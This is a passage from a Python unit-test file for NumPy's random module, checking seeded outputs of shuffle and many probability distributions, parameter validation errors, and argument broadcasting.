# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, 1),
("b", np.int32, 1)])]:
np.random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
np.random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
np.random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
np.random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
np.random.seed(self.seed)
actual = np.random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
np.random.seed(self.seed)
actual = np.random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
def test_chisquare(self):
np.random.seed(self.seed)
actual = np.random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
np.random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = np.random.mtrand.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, np.random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, np.random.mtrand.dirichlet, alpha)
def test_exponential(self):
np.random.seed(self.seed)
actual = np.random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(np.random.exponential(scale=0), 0)
assert_raises(ValueError, np.random.exponential, scale=-0.)
def test_f(self):
np.random.seed(self.seed)
actual = np.random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
np.random.seed(self.seed)
actual = np.random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(np.random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, np.random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
np.random.seed(self.seed)
actual = np.random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_gumbel(self):
np.random.seed(self.seed)
actual = np.random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(np.random.gumbel(scale=0), 0)
assert_raises(ValueError, np.random.gumbel, scale=-0.)
def test_hypergeometric(self):
np.random.seed(self.seed)
actual = np.random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = np.random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = np.random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
np.random.seed(self.seed)
actual = np.random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(np.random.laplace(scale=0), 0)
assert_raises(ValueError, np.random.laplace, scale=-0.)
def test_logistic(self):
np.random.seed(self.seed)
actual = np.random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
np.random.seed(self.seed)
actual = np.random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(np.random.lognormal(sigma=0), 1)
assert_raises(ValueError, np.random.lognormal, sigma=-0.)
def test_logseries(self):
np.random.seed(self.seed)
actual = np.random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_multinomial(self):
np.random.seed(self.seed)
actual = np.random.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
np.random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = np.random.multivariate_normal(mean, cov, size)
desired = np.array([[[1.463620246718631, 11.73759122771936 ],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = np.random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, np.random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(np.random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises a ValueError when check_valid='raise'
assert_raises(ValueError, np.random.multivariate_normal, mean, cov,
check_valid='raise')
def test_negative_binomial(self):
np.random.seed(self.seed)
actual = np.random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = np.random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
np.random.seed(self.seed)
actual = np.random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
np.random.seed(self.seed)
actual = np.random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(np.random.normal(scale=0), 0)
assert_raises(ValueError, np.random.normal, scale=-0.)
def test_pareto(self):
np.random.seed(self.seed)
actual = np.random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# http://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
np.random.seed(self.seed)
actual = np.random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, np.random.poisson, lamneg)
assert_raises(ValueError, np.random.poisson, [lamneg]*10)
assert_raises(ValueError, np.random.poisson, lambig)
assert_raises(ValueError, np.random.poisson, [lambig]*10)
def test_power(self):
np.random.seed(self.seed)
actual = np.random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
np.random.seed(self.seed)
actual = np.random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(np.random.rayleigh(scale=0), 0)
assert_raises(ValueError, np.random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
np.random.seed(self.seed)
actual = np.random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
np.random.seed(self.seed)
actual = np.random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
np.random.seed(self.seed)
actual = np.random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(np.random.standard_gamma(shape=0), 0)
assert_raises(ValueError, np.random.standard_gamma, shape=-0.)
def test_standard_normal(self):
np.random.seed(self.seed)
actual = np.random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
np.random.seed(self.seed)
actual = np.random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
np.random.seed(self.seed)
actual = np.random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
np.random.seed(self.seed)
actual = np.random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = np.random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
np.random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, np.random.uniform, throwing_float, throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, np.random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
np.random.seed(self.seed)
actual = np.random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
np.random.seed(self.seed)
r = np.random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
def test_wald(self):
np.random.seed(self.seed)
actual = np.random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
np.random.seed(self.seed)
actual = np.random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
assert_equal(np.random.weibull(a=0), 0)
assert_raises(ValueError, np.random.weibull, a=-0.)
def test_zipf(self):
np.random.seed(self.seed)
actual = np.random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast(object):
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
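# Illustrative sketch of the behaviour under test (added comment, not part of
# the original suite): a length-3 list for one parameter broadcasts against a
# length-1 list for the other, e.g. np.random.normal([0] * 3, [1]) returns an
# array of shape (3,), and a negative scale anywhere in the broadcast raises
# ValueError.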
def setup(self):
self.seed = 123456789
def setSeed(self):
np.random.seed(self.seed)
# TODO: Include test for randint once it can broadcast
# Can steal the test written in PR #6938
def test_uniform(self):
low = [0]
high = [1]
uniform = np.random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.setSeed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = np.random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.setSeed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.setSeed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = np.random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.setSeed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.setSeed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = np.random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = np.random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = np.random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.setSeed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.setSeed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = np.random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.setSeed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.setSeed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = np.random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.setSeed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
self.setSeed()
desired = np.array([6.869638627492048, 0.785880199263955])
actual = np.random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = np.random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.setSeed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = np.random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.setSeed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.setSeed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = np.random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.setSeed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = np.random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.setSeed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.setSeed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = np.random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.setSeed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = np.random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = np.random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = np.random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.setSeed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.setSeed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = np.random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.setSeed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.setSeed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = np.random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.setSeed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.setSeed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = np.random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.setSeed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
self.setSeed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = np.random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.setSeed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = np.random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.setSeed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
self.setSeed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = np.random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.setSeed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two, right)
self.setSeed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3, right)
self.setSeed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two, right * 3)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = np.random.binomial
desired = np.array([1, 1, 1])
self.setSeed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.setSeed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = np.random.negative_binomial
desired = np.array([1, 0, 1])
self.setSeed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.setSeed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
